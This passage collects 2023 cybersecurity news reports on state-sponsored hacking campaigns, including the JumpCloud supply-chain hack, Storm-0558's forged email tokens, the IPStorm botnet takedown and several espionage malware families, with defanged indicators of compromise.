On the 11 companies that were successfully infiltrated, the threat actors executed malicious code to conduct reconnaissance of the firewall configurations and determine the next course of action.
"This kind of coordination requires planning and resources," SektorCERT said in a detailed timeline of events. "The advantage of attacking simultaneously is that the information about one attack cannot spread to the other targets before it is too late."
"This puts the power of information sharing out of play because no one can be warned in advance about the ongoing attack since everyone is attacked at the same time. It is unusual – and extremely effective."
A second wave of attacks targeting more organizations was subsequently recorded from May 22 to 25 by an attack group with previously unseen cyber weapons, raising the possibility that two different threat actors were involved in the campaign.
That said, it's currently unclear if the groups collaborated with each other, worked for the same employer, or were acting independently.
These attacks are suspected to have weaponized two more critical bugs in Zyxel gear (CVE-2023-33009 and CVE-2023-33010, CVSS scores: 9.8) as zero-days to co-opt the firewalls into Mirai and MooBot botnets, given that patches for them were released by the company on May 24, 2023.
The compromised devices, in some cases, were used to conduct distributed denial-of-service (DDoS) attacks against unnamed companies in the U.S. and Hong Kong.
"After the exploit code for some of the vulnerabilities became publicly known around 30/5, attack attempts against the Danish critical infrastructure exploded – especially from IP addresses in Poland and Ukraine," SektorCERT explained.
The onslaught of attacks prompted the affected entities to disconnect from the internet and go into island mode, the agency further added.
But it's not only nation-state actors. The energy sector is also increasingly becoming a focus for ransomware groups, with initial access brokers (IABs) actively promoting unauthorized access to nuclear energy firms, according to a report from Resecurity earlier this week.
The development comes as Censys discovered six hosts belonging to NTC Vulkan, a Moscow-based IT contractor that's alleged to have supplied offensive cyber tools to Russian intelligence agencies, including Sandworm.
Furthermore, the research uncovered a connection to a group called Raccoon Security via an NTC Vulkan certificate.
"Racoon Security is a brand of NTC Vulkan and that it is possible that Raccoon Security's activities include either previous or current participation in the previously-mentioned leaked initiatives contracted by the GRU," Matt Lembright, director of Federal Applications at Censys, said.
U.S. Takes Down IPStorm Botnet, Russian-Moldovan Mastermind Pleads Guilty
16.11.23 BigBrothers The Hacker News
The U.S. government on Tuesday announced the takedown of the IPStorm botnet proxy network and its infrastructure, as the Russian and Moldovan national behind the operation pleaded guilty.
"The botnet infrastructure had infected Windows systems then further expanded to infect Linux, Mac, and Android devices, victimizing computers and other electronic devices around the world, including in Asia, Europe, North America and South America," the Department of Justice (DoJ) said in a press statement.
Sergei Makinin, who developed and deployed the malicious software to infiltrate thousands of internet-connected devices from June 2019 through December 2022, faces a maximum of 30 years in prison.
The Golang-based botnet malware, prior to its dismantling, turned the infected devices into proxies as part of a for-profit scheme, which was then offered to other customers via proxx[.]io and proxx[.]net.
"IPStorm is a botnet that abuses a legitimate peer-to-peer (p2p) network called InterPlanetary File System (IPFS) as a means to obscure malicious traffic," cybersecurity firm Intezer noted in October 2020.
The botnet was first documented by Anomali in May 2019, and, over the years, broadened its focus to target other operating systems such as Linux, macOS, and Android.
Threat actors who wish to hide their malicious activities could purchase illegitimate access to more than 23,000 bots for "hundreds of dollars a month" to route their traffic. Makinin is estimated to have netted at least $550,000 from the scheme.
Pursuant to the plea agreement, Makinin is expected to forfeit cryptocurrency wallets linked to the offense.
"The InterPlanetary Storm botnet was complex and used to power various cybercriminal activities by renting it as a proxy as a service system over infected IoT devices," Alexandru Catalin Cosoi, senior director of investigation and forensics unit at Bitdefender, said in a statement shared with The Hacker News.
"Our initial research back in 2020 uncovered valuable clues to the culprit behind its operation, and we are extremely pleased it helped lead to arrests. This investigation is another primary example of law enforcement and the private cybersecurity sector working together to shut down illegal online activities and bring those responsible to justice."
Chinese Hackers Launch Covert Espionage Attacks on 24 Cambodian Organizations
13.11.23 BigBrothers The Hacker News
Cybersecurity researchers have discovered what they say is malicious cyber activity orchestrated by two prominent Chinese nation-state hacking groups targeting 24 Cambodian government organizations.
"This activity is believed to be part of a long-term espionage campaign," Palo Alto Networks Unit 42 researchers said in a report last week.
"The observed activity aligns with geopolitical goals of the Chinese government as it seeks to leverage their strong relations with Cambodia to project their power and expand their naval operations in the region."
Targeted organizations include defense, election oversight, human rights, national treasury and finance, commerce, politics, natural resources, and telecommunications.
The assessment stems from the persistent nature of inbound network connections originating from these entities to a China-linked adversarial infrastructure that masquerades as cloud backup and storage services over a "period of several months."
Some of the command-and-control (C2) domain names are listed below -
api.infinitycloud[.]info
connect.infinitycloud[.]info
connect.infinitybackup[.]net
file.wonderbackup[.]com
login.wonderbackup[.]com
update.wonderbackup[.]com
The tactic is likely an attempt on the part of the attackers to fly under the radar and blend in with legitimate network traffic.
What's more, the links to China are based on the fact that the threat actor's activity has been observed primarily during regular business hours in China, with a drop recorded in late September and early October 2023, coinciding with the Golden Week national holidays, before resuming to regular levels on October 9.
China-nexus hacking groups such as Emissary Panda, Gelsemium, Granite Typhoon, Mustang Panda, RedHotel, ToddyCat, and UNC4191 have launched an array of espionage campaigns targeting public- and private sectors across Asia in recent months.
Last month, Elastic Security Labs detailed an intrusion set codenamed REF5961 that was found leveraging custom backdoors such as EAGERBEE, RUDEBIRD, DOWNTOWN, and BLOODALCHEMY in its attacks directed against the Association of Southeast Asian Nations (ASEAN) countries.
The malware families "were discovered to be co-residents with a previously reported intrusion set, REF2924," the latter of which is assessed to be a China-aligned group owing to its use of ShadowPad and tactical overlaps with Winnti and ChamelGang.
The disclosures also follow a report from Recorded Future highlighting the shift in Chinese cyber espionage activity, describing it as more mature and coordinated, and with a strong focus on exploiting known and zero-day flaws in public-facing email servers, security, and network appliances.
Since the beginning of 2021, Chinese state-sponsored groups have been attributed to the exploitation of 23 zero-day vulnerabilities, including those identified in Microsoft Exchange Server, Solarwinds Serv-U, Sophos Firewall, Fortinet FortiOS, Barracuda Email Security Gateway, and Atlassian Confluence Data Center and Server.
The state-sponsored cyber operations have evolved "from broad intellectual property theft to a more targeted approach supporting specific strategic, economic, and geopolitical goals, such as those related to the Belt and Road Initiative and critical technologies," the company said.
STARK#MULE Targets Koreans with U.S. Military-themed Document Lures
28.7.23 BigBrothers The Hacker News
An ongoing cyber attack campaign has set its sights on Korean-speaking individuals by employing U.S. Military-themed document lures to trick them into running malware on compromised systems.
Cybersecurity firm Securonix is tracking the activity under the name STARK#MULE.
"Based on the source and likely targets, these types of attacks are on par with past attacks stemming from typical North Korean groups such as APT37 as South Korea has historically been a primary target of the group, especially its government officials," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
APT37, also known by the names Nickel Foxcroft, Reaper, Ricochet Chollima, and ScarCruft, is a North Korean nation-state actor that's known to exclusively focus on targets in its southern counterpart, specifically those involved in reporting on North Korea and supporting defectors.
Attack chains mounted by the group have historically relied on social engineering to phish victims and deliver payloads such as RokRat onto target networks. That said, the adversarial collective has expanded its offensive arsenal with a variety of malware families in recent months, including a Go-based backdoor called AblyGo.
A notable trait of the new campaign is the use of compromised Korean e-commerce websites for staging payloads and command-and-control (C2) in an attempt to fly under the radar of security solutions installed on the systems.
The phishing emails that act as the progenitor make use of U.S. Army recruitment messages to convince recipients into opening a ZIP archive file, which contains a shortcut file that appears under the guise of a PDF document.
The shortcut file, when launched, displays a decoy PDF, but also surreptitiously activates the execution of a rogue "Thumbs.db" file present in the archive file.
"This file performs several functions which include downloading further stagers and leveraging schtasks.exe to establish persistence," the researchers explained.
Two of the next-stage modules – "lsasetup.tmp" and "winrar.exe" – are retrieved from a compromised e-commerce website named "www.jkmusic.co[.]kr," the latter of which is used to extract and run the contents of "lsasetup.tmp," an obfuscated binary that reached out to a second e-commerce site named "www.notebooksell[.]kr."
"Once the connection was established, the attackers were able to acquire system details such as system MAC, Windows version, [and] IP address," the researchers said. "Both websites are registered in Korea [and] only utilize the HTTP protocol."
The disclosure comes as APT37 has also been observed making use of CHM files in phishing emails impersonating security emails from financial institutes and insurance companies to deploy information-stealing malware and other binaries, according to the AhnLab Security Emergency Response Center (ASEC).
"In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments," ASEC said.
APT37 is one of the many North Korean state-sponsored groups that have drawn attention for executing attacks that are designed to perpetrate financial theft – including the recent attacks on Alphapo and CoinsPaid – and gather intelligence in pursuit of the regime's political and national security objectives.
This also comprises the notorious Lazarus Group and its sub-clusters Andariel and BlueNoroff, with the actors leveraging a new backdoor dubbed ScoutEngine and a completely rewritten version of a malware framework called MATA (MATAv5) in intrusions aimed at defense contractors in Eastern Europe in September 2022.
"This sophisticated malware, completely rewritten from scratch, exhibits an advanced and complex architecture that makes use of loadable and embedded modules and plugins," Kaspersky said in its APT trends report for Q2 2023.
"The malware leverages Inter-Process Communication (IPC) channels internally and employs a diverse range of commands, enabling it to establish proxy chains across various protocols, including within the victim's environment."
North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder
25.7.23 BigBrothers The Hacker News
North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address.
Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already being monitored as Jade Sleet and TraderTraitor, a group with a history of striking blockchain and cryptocurrency sectors.
UNC4899 also overlaps with APT43, another hacking crew associated with the Democratic People's Republic of Korea (DPRK) that was unmasked earlier this March as conducting a series of campaigns to gather intelligence and siphon cryptocurrency from targeted companies.
The adversarial collective's modus operandi is characterized by the use of Operational Relay Boxes (ORBs) using L2TP IPsec tunnels along with commercial VPN providers to disguise the attacker's true point of origin, with commercial VPN services acting as the final hop.
"There have been many occasions in which DPRK threat actors did not employ this last hop, or mistakenly did not utilize this while conducting actions on operations on the victim's network," the company said in an analysis published Monday, adding it observed "UNC4899 connecting directly to an attacker-controlled ORB from their 175.45.178[.]0/24 subnet."
The intrusion directed against JumpCloud took place on June 22, 2023, as part of a sophisticated spear-phishing campaign that leveraged the unauthorized access to breach fewer than five customers and less than 10 systems in what's called a software supply chain attack.
Mandiant's findings are based on an incident response initiated in the aftermath of a cyber attack against one of JumpCloud's impacted customers, an unnamed software solutions entity, the starting point being a malicious Ruby script ("init.rb") executed via the JumpCloud agent on June 27, 2023.
A notable aspect of the incident is its targeting of four Apple systems running macOS Ventura versions 13.3 or 13.4.1, underscoring North Korean actors' continued investment in honing malware specially tailored for the platform in recent months.
"Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework," the company explained. "In at least one instance, the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent."
The script, for its part, is engineered to download and execute a second-stage payload named FULLHOUSE.DOORED, using it as a conduit to deploy additional malware such as STRATOFEAR and TIEDYE, after which the prior payloads were removed from the system in an attempt to cover up the tracks -
FULLHOUSE.DOORED - A C/C++-based first-stage backdoor that communicates using HTTP and comes with support for shell command execution, file transfer, file management, and process injection
STRATOFEAR - A second-stage modular implant that's chiefly designed to gather system information as well as retrieve and execute more modules from a remote server or loaded from disk
TIEDYE - A second-stage Mach-O executable that can communicate with a remote server to run additional payloads, harvest basic system information, and execute shell commands
TIEDYE is also said to exhibit similarities to RABBITHUNT, a backdoor written in C++ that communicates via a custom binary protocol over TCP and which is capable of reverse shell, file transfer, process creation, and process termination.
"The campaign targeting JumpCloud, and the previously reported DPRK supply chain compromise from earlier this year which affected the Trading Technologies X_TRADER application and 3CX Desktop App software, exemplifies the cascading effects of these operations to gain access to service providers in order to compromise downstream victims," Mandiant said.
"Both operations have suspected ties to financially motivated DPRK actors, suggesting that DPRK operators are implementing supply chain TTPs to target select entities as part of increased efforts to target cryptocurrency and fintech-related assets."
The development comes days after GitHub warned of a social engineering attack mounted by the TraderTraitor actor to trick employees working at blockchain, cryptocurrency, online gambling, and cybersecurity companies into executing code hosted in a GitHub repository that relied on malicious packages hosted on npm.
The infection chain has been found to leverage the malicious npm dependencies to download an unknown second-stage payload from an actor-controlled domain. The packages have since been taken down and the accounts suspended.
"The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server," Phylum said in a new analysis detailing the discovery of new npm modules used in the same campaign.
"The vast attack surface presented by these ecosystems is hard to ignore. It's virtually impossible for a developer in today's world not to rely on any open-source packages. This reality is typically exploited by threat actors aiming to maximize their blast radius for widespread distribution of malware, such as stealers or ransomware."
UPCOMING WEBINAR
Shield Against Insider Threats: Master SaaS Security Posture Management
Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.
Get Ready to Learn
Pyongyang has long used cryptocurrency heists to fuel its sanctioned nuclear weapons program, while simultaneously orchestrating cyber espionage attacks to collect strategic intelligence in support of the regime's political and national security priorities.
"North Korea's intelligence apparatus possesses the flexibility and resilience to create cyber units based on the needs of the country," Mandiant noted last year. "Additionally overlaps in infrastructure, malware, and tactics, techniques and procedures indicate there are shared resources amongst their cyber operations."
The Lazarus Group remains a prolific state-sponsored threat actor in this regard, consistently mounting attacks that are designed to deliver everything from remote access trojans to ransomware to purpose-built backdoors and also demonstrating a readiness to shift tactics and techniques to hinder analysis and make their tracking much harder.
This is exemplified by its ability to not only compromise vulnerable Microsoft Internet Information Service (IIS) web servers, but also use them as malware distribution centers in watering hole attacks aimed at South Korea, according to the AhnLab Security Emergency Response Center (ASEC).
"The threat actor is continuously using vulnerability attacks for initial access to unpatched systems," ASEC said. "It is one of the most dangerous threat groups highly active worldwide."
A second RGB-backed group that's equally focused on amassing information on geopolitical events and negotiations affecting the DPRK's interests is Kimsuky, which has been detected using Chrome Remote Desktop to remotely commandeer hosts already compromised through backdoors such as AppleSeed.
"The Kimsuky APT group is continuously launching spear-phishing attacks against Korean users," ASEC pointed out this month. "They usually employ methods of malware distribution through disguised document files attached to emails, and users who open these files may lose control over their current system."
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack
21.7.23 BigBrothers The Hacker News
An analysis of the indicators of compromise (IoCs) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX.
The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor."
"The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments."
"They actively seek access to tools and networks that can serve as gateways to more extensive opportunities. Their tendency to execute multiple levels of supply chain intrusions before engaging in financially motivated theft is noteworthy."
In a related development, CrowdStrike, which is working with JumpCloud to probe the incident, pinned the attack to a North Korean actor known as Labyrinth Chollima, a sub cluster within the infamous Lazarus Group, according to Reuters.
The infiltration was used as a "springboard" to target cryptocurrency companies, the news agency said, indicating an attempt on part of the adversary to generate illegal revenues for the sanctions-hit nation.
The revelations also coincide with a low-volume social engineering campaign identified by GitHub that targets the personal accounts of employees of technology firms, using a mix of repository invitations and malicious npm package dependencies. The targeted accounts are associated with blockchain, cryptocurrency, online gambling, or cybersecurity sectors.
The Microsoft subsidiary connected the campaign to a North Korean hacking group it tracks under the name Jade Sleet (aka TraderTraitor).
"Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms," GitHub's Alexis Wales said in a report published on July 18, 2023.
The attack chains involve setting up bogus personas on GitHub and other social media services such as LinkedIn, Slack, and Telegram, although in some cases the threat actor is believed to have taken control of legitimate accounts.
Under the assumed persona, Jade Sleet initiates contact with the targets and invites them to collaborate on a GitHub repository, convincing the victims into cloning and running the contents, which feature decoy software with malicious npm dependencies that act as first-stage malware to download and execute second-stage payloads on the infected machine.
The malicious npm packages, per GitHub, are part of a campaign that first came to light last month, when Phylum detailed a supply chain threat involving a unique execution chain that uses a pair of fraudulent modules to fetch an unknown piece of malware from a remote server.
SentinelOne, in its latest analysis, said 144.217.92[.]197, an IP address linked to the JumpCloud attack, resolves to npmaudit[.]com, one of the eight domains listed by GitHub as used to fetch the second-stage malware. A second IP address 23.29.115[.]171 maps to npm-pool[.]org.
"It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks," Hegel said. "The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions."
"The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks," Hegel added.
CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise
17.7.23 BigBrothers The Hacker News
The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise.
"As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in an analysis of the group published last week.
Gamaredon, also called Aqua Blizzard, Armageddon, Shuckworm, or UAC-0010, is a state-sponsored actor with ties to the SBU Main Office in the Autonomous Republic of Crimea, which was annexed by Russia in 2014. The group is estimated to have infected thousands of government computers.
It is also one of the many Russian hacking crews that have maintained an active presence since the start of the Russo-Ukrainian war in February 2022, leveraging phishing campaigns to deliver PowerShell backdoors such as GammaSteel to conduct reconnaissance and execute additional commands.
The messages typically come bearing an archive containing an HTM or HTA file that, when opened, activates the attack sequence.
According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb – within a time period of 30 to 50 minutes.
The group has also been observed consistently evolving its tactics, making use of USB infection techniques for propagation. A host operating in a compromised state for a week could have anywhere between 80 to 120 malicious files, the agency noted.
Also significant is the threat actor's use of AnyDesk software for interactive remote access, PowerShell scripts for session hijacking to bypass two-factor authentication (2FA), and Telegram and Telegraph for fetching the command-and-control (C2) server information.
"Attackers take separate measures to ensure fault tolerance of their network infrastructure and avoid detection at the network level," CERT-UA said. "During the day, the IP addresses of intermediate control nodes can change from 3 to 6 or more times, which, among other things, indicates the appropriate automation of the process."
U.S. Government Agencies' Emails Compromised in China-Backed Cyber Attack
13.7.23 BigBrothers The Hacker News
An unnamed Federal Civilian Executive Branch (FCEB) agency in the U.S. detected anomalous email activity in mid-June 2023, leading to Microsoft's discovery of a new China-linked espionage campaign targeting two dozen organizations.
The details come from a joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on July 12, 2023.
"In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said. "Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data."
While the name of the government agency was not revealed, CNN and the Washington Post reported it was the U.S. State Department, citing people familiar with the matter. Also targeted were the Commerce Department as well as the email accounts belonging to a congressional staffer, a U.S. human rights advocate, and U.S. think tanks. The number of affected organizations in the U.S. is estimated to be in the single digits.
The disclosure comes a day after the tech giant attributed the campaign to an emerging "China-based threat actor" it tracks under the name Storm-0558, which primarily targets government agencies in Western Europe and focuses on espionage and data theft. Evidence gathered so far shows that the malicious activity began a month earlier before it was detected.
China, however, has rejected accusations it was behind the hacking incident, calling the U.S. "the world's biggest hacking empire and global cyber thief" and that it's "high time that the U.S. explained its cyber attack activities and stopped spreading disinformation to deflect public attention."
The attack chain entailed the cyberspies leveraging forged authentication tokens to gain access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com. The tokens were forged using an acquired Microsoft account (MSA) consumer signing key. The exact method by which the key was secured remains unclear.
Also used by Storm-0558 to facilitate credential access are two custom malware tools named Bling and Cigril, the latter of which has been characterized as a trojan that decrypts encrypted files and runs them directly from system memory in order to avoid detection.
CISA said the FCEB agency was able to identify the breach by leveraging enhanced logging in Microsoft Purview Audit, specifically using the MailItemsAccessed mailbox-auditing action.
The agency is further recommending that organizations enable Purview Audit (Premium) logging, turn on Microsoft 365 Unified Audit Logging (UAL), and ensure logs are searchable by operators to allow hunting for this kind of activity and differentiate it from expected behavior within the environment.
"Organizations are encouraged to look for outliers and become familiar with baseline patterns to better understand abnormal versus normal traffic," CISA and FBI added.
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments
12.7.23 BigBrothers The Hacker News
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data.
The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts.
The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe.
"They focus on espionage, data theft, and credential access," Microsoft said. "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access."
The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company.
Microsoft said it notified all targeted or compromised organizations directly via their tenant admins. It did not name the organizations and agencies affected and the number of accounts that may have been hacked.
However, according to the Washington Post, the attackers also broke into a number of unclassified U.S. email accounts.
The access to customer email accounts, per Redmond, was facilitated through Outlook Web Access in Exchange Online (OWA) and Outlook.com by forging authentication tokens.
"The actor used an acquired MSA key to forge tokens to access OWA and Outlook.com," it explained. "MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems."
"The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail."
There is no evidence that the threat actor used Azure AD keys or any other MSA keys to carry out the attacks. Microsoft has since blocked the usage of tokens signed with the acquired MSA key in OWA to mitigate the attack.
"This type of espionage-motivated adversary seeks to abuse credentials and gain access to data residing in sensitive systems," Charlie Bell, executive vice president of Microsoft Security, said.
The disclosure comes more than a month after Microsoft exposed critical infrastructure attacks mounted by a Chinese adversarial collective called Volt Typhoon (aka Bronze Silhouette or Vanguard Panda) targeting the U.S.
Swedish Data Protection Authority Warns Companies Against Google Analytics Use
5.7.23 BigBrothers The Hacker News
The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year.
The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies CDON, Coop, Dagens Industri, and Tele2.
"In its audits, IMY considers that the data transferred to the U.S. via Google's statistics tool is personal data because the data can be linked with other unique data that is transferred," IMY said.
"The authority also concludes that the technical security measures that the companies have taken are not sufficient to ensure a level of protection that essentially corresponds to that guaranteed within the EU/EEA."
The data protection authority also fined $1.1 million for Swedish telecom service provider Tele2 and less than $30,000 for local online marketplace CDON failing to implement adequate security measures to anonymize the data prior to the transfer.
Furthermore, CDON, Coop, and Dagens Industri have been ordered to cease using Google Analytics. Tele2 is said to have voluntarily stopped using the service.
The investigation, the IMY added, was based on a complaint filed by the privacy non-profit None of Your Business (noyb) alleging violations of the General Data Protection Regulation (GDPR) laws.
The decision is rooted in the fact that such E.U.-U.S. data transfers have been found illegal in light of potential surveillance worries that data stored in U.S. servers could be subject to access by intelligence agencies in the country.
Similar concerns have led to Meta being levied a record $1.3 billion fine by European Union data protection agencies. That said, the E.U. and U.S. are in the process of finalizing a new data transfer arrangement, called the E.U.-U.S. Data Privacy Framework, that replaces the now-invalid Privacy Shield.
Iranian Hackers Using POWERSTAR Backdoor in Targeted Espionage Attacks
1.7.23 BigBrothers The Hacker News
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR.
"There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week.
The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.
Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiao, suggesting that the group is utilizing an array of espionage tools at its disposal to realize its strategic objectives.
POWERSTAR is another addition to the group's arsenal. Also called CharmPower, the backdoor was first publicly documented by Check Point in January 2022, uncovering its use in connection with attacks weaponizing the Log4Shell vulnerabilities in publicly-exposed Java applications.
It has since been put to use in at least two other campaigns, as documented by PwC in July 2022 and Microsoft in April 2023.
Volexity, which detected a rudimentary variant of POWERSTAR in 2021 distributed by a malicious macro embedded in DOCM file, said the May 2023 attack wave leverages an LNK file inside a password-protected RAR file to download the backdoor from Backblaze, while also taking steps to hinder analysis.
"With POWERSTAR, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk," the researchers said.
"This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control (C2) server prevents future successful decryption of the corresponding POWERSTAR payload."
The backdoor comes with an extensive set of features that enable it to remotely execute PowerShell and C# commands, set up persistence, collect system information, and download and execute more modules to enumerate running processes, capture screenshots, search for files matching specific extensions, and monitor if persistence components are still intact.
Also improved and expanded from the earlier version is the cleanup module that's designed to erase all traces of the malware's footprint as well as delete persistence-related registry keys. These updates point to Charming Kitten's continued efforts to refine its techniques and evade detection.
Volexity said it also detected a different variant of POWERSTAR that attempts to retrieve a hard-coded C2 server by decoding a file stored on the decentralized InterPlanetary Filesystem (IPFS), signaling an attempt to make its attack infrastructure more resilient.
The development coincides with a MuddyWater's (aka Static Kitten) use of previously undocumented command-and-control (C2) framework called PhonyC2 to deliver malicious payload to compromised hosts.
"The general phishing playbook used by Charming Kitten and the overall purpose of POWERSTAR remain consistent," the researchers said. "The references to persistence mechanisms and executable payloads within the POWERSTAR Cleanup module strongly suggests a broader set of tools used by Charming Kitten to conduct malware-enabled espionage."
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware
30.6.23 BigBrothers The Hacker News
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in phishing attacks, adding another piece to the group's wide-ranging toolset.
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report.
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group.
The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation.
Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contains a range of features to create and terminate processes and move, read, and write files on the infected host. The use of NukeSped overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.
Andariel's weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was previously documented by AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.
The latest attack chain discovered by Kaspsersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents. The files, when opened, prompt the recipients to enable macros, leading to the execution of VBA code responsible for downloading the trojan.
Described as a simple but limited backdoor, EarlyRat is designed to collect and exfiltrate system information to a remote server as well as execute arbitrary commands. It also shares high-level similarities with MagicRAT, not to mention written using a framework called PureBasic. MagicRAT, on the other hand, employs the Qt Framework.
Another unseen tactic observed in attacks exploiting the Log4j Log4Shell vulnerability last year concerns the use of legitimate off-the-shelf tools like 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY for further exploitation of the target.
"Despite being an APT group, Lazarus is known for performing typical cyber crime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated," Kaspersky said. "Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware."
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers
26.6.23 BigBrothers The Hacker News
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard.
The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said.
Midnight Blizzard, formerly known as Nobelium, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes.
The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities.
It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area.
"These credential attacks use a variety of password spray, brute-force, and token theft techniques," Microsoft said in a series of tweets, adding the actor "also conducted session replay attacks to gain initial access to cloud resources leveraging stolen sessions likely acquired via illicit sale."
The tech giant further called out APT29 for its use of residential proxy services to route malicious traffic in an attempt to obfuscate connections made using compromised credentials.
"The threat actor likely used these IP addresses for very short periods, which could make scoping and remediation challenging," the Windows makers said.
The development comes as Recorded Future detailed a new spear-phishing campaign orchestrated by APT28 (aka BlueDelta, Forest Blizzard, FROZENLAKE, Iron Twilight, and Fancy Bear) targeting government and military entities in Ukraine since November 2021.
The attacks leveraged emails bearing attachments exploiting multiple vulnerabilities in the open-source Roundcube webmail software (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to conduct reconnaissance and data gathering.
A successful breach enabled the Russian military intelligence hackers to deploy rogue JavaScript malware that redirected the incoming emails of targeted individuals to an email address under the attackers' control as well as steal their contact lists.
"The campaign displayed a high level of preparedness, quickly weaponizing news content into lures to exploit recipients," the cybersecurity company said. "The spear-phishing emails contained news themes related to Ukraine, with subject lines and content mirroring legitimate media sources."
More importantly, the activity is said to dovetail with another set of attacks weaponizing a then-zero-day flaw in Microsoft Outlook (CVE-2023-23397) that Microsoft disclosed as employed in "limited targeted attacks" against European organizations.
The privilege escalation vulnerability was addressed as part of Patch Tuesday updates rolled out in March 2023.
